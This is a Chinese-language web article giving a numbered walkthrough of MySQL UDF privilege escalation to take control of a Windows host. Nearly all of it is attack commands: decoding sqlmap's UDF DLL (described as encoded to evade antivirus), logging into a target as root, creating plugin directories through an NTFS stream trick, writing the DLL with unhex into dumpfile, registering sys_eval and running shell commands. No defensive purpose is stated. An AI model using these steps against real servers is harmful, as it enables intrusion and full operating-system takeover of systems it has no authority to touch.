您好,登錄后才能下訂單哦!
本文主要給大家介紹MySQL中UDF提權獲取主機控制權的詳細步驟,文章內(nèi)容都是筆者用心摘選和編輯的,具有一定的針對性,對大家的參考意義還是比較大的,下面跟筆者一起了解下MySQL中UDF提權獲取主機控制權的詳細步驟吧。
1、python clock.py -d -i lib_mysqludfsys.dll
此步是獲取***用的UDF dll。首先要安裝sqlmap,然后運行上述命令即可得到解碼之后的UDF dll。(sqlmap對其進行編碼是為了免殺)
2、mysql -h target_ip -uroot -p
與目標MySQL建立連接
3、select version();
查看MySQL版本
4、select @@basedir;
查看MySQL的安裝目錄。假設為 c:\program files\mysql\mysql server 5.1
5、select @@plugin_dir;
查看MySQL的插件目錄。假設為c:\program files\mysql\mysql server 5.1\plugin
6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';
創(chuàng)建lib目錄
7、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';
創(chuàng)建plugin目錄
8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";
創(chuàng)建udf.dll,上述命令中hex_of_udf.dll是udf.dll的十六進制文本,可用winhex等編輯軟件獲得
9、create function sys_eval returns string soname 'udf.dll';
創(chuàng)建函數(shù)
10、select sys_eval('whoami');
執(zhí)行shell命令,表明以獲取操作系統(tǒng)的控制權
看完以上關于MySQL中UDF提權獲取主機控制權的詳細步驟,很多讀者朋友肯定多少有一定的了解,如需獲取更多的行業(yè)知識信息 ,可以持續(xù)關注我們的行業(yè)資訊欄目的。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。